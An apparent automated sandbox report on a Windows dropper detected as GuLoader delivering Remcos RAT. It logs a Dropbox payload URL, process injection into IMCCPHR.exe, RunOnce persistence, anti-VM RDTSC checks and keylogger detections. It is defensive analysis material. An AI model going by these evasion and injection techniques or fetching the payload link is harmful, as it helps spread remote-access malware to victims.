Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090E5000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/cd/0/get/CmsIyjcNSqE9pfci-uOQ5iPpUwth
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/rtK
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.docsend.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/S
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/pithos/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/playlist/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/scl/fi/0jhi0626x7zqfgid1v9te/UjzebvskPbXnryFB92.bin?rlkey=65dc2nu7arz5szq4ev
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/static/api/
Source: IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropboxstatic.com/static/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hellofax.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hellosign.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.paypal.com/sdk/js
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown HTTPS traffic detected: 162.125.6.18:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.125.6.15:443 -> 192.168.2.5:49726 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405421
Yara detected Keylogger Generic
Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process Stats: CPU usage > 49%
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004033B6 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_004033B6
Detected potential crypto function
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00406847 0_2_00406847
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00404C5E 0_2_00404C5E
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nshBC5B.tmp\System.dll E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
Sample file is different than original file name gathered from version info
Source: 25FC004658_Femetagershusenes.exe, 00000000.00000002.2941062350.0000000000456000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameequable.exed" vs 25FC004658_Femetagershusenes.exe
Source: 25FC004658_Femetagershusenes.exe Binary or memory string: OriginalFilenameequable.exed" vs 25FC004658_Femetagershusenes.exe
Uses 32bit PE files
Source: 25FC004658_Femetagershusenes.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@3/11@2/2
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004033B6 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_004033B6
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004046E2 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW, 0_2_004046E2
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk, 0_2_00402095
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File created: C:\Users\user\Documents\Emissionsbreve.ini Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File created: C:\Users\user\AppData\Local\Temp\nsrBB11.tmp Jump to behavior
Source: 25FC004658_Femetagershusenes.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 25FC004658_Femetagershusenes.exe Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File read: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe "C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe"
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe"
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe" Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File written: C:\Users\user\AppData\Local\Temp\Lavridss112\menneskevrdigstes\Barnagtigt138.ini Jump to behavior
Source: 25FC004658_Femetagershusenes.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.2942202827.0000000008A4C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3750256172.000000000760C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
Drops PE files
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File created: C:\Users\user\AppData\Local\Temp\nshBC5B.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File created: C:\Users\user\AppData\Local\Temp\Ddbiderens\Funktionsafprvningerne.exe Jump to dropped file
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Omsadlings Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Omsadlings Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Omsadlings Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Omsadlings Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe API/Special instruction interceptor: Address: 8E70697
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe API/Special instruction interceptor: Address: 7A30697
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe RDTSC instruction interceptor: First address: 8E1AE6F second address: 8E1AE6F instructions: 0x00000000 rdtsc 0x00000002 clc 0x00000003 cmp ebx, ecx 0x00000005 jc 00007F31A44F07B3h 0x00000007 cmp dx, 6F9Ch 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cld 0x0000000f rdtsc
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe RDTSC instruction interceptor: First address: 79DAE6F second address: 79DAE6F instructions: 0x00000000 rdtsc 0x00000002 clc 0x00000003 cmp ebx, ecx 0x00000005 jc 00007F31A48344D3h 0x00000007 cmp dx, 6F9Ch 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cld 0x0000000f rdtsc
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nshBC5B.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_00405974
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004064C6 FindFirstFileW,FindClose, 0_2_004064C6
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe API call chain: ExitProcess graph end node
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00402E41 GetTempPathW,GetTickCount,GetModuleFileNameW,LdrInitializeThunk,GetFileSize,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,CreateFileW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 0_2_00402E41
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18

HIPS / PFW / Operating System Protection Evasion
barindex
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Thread created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe EIP: 79DAB97 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Memory written: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe base: 4260000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
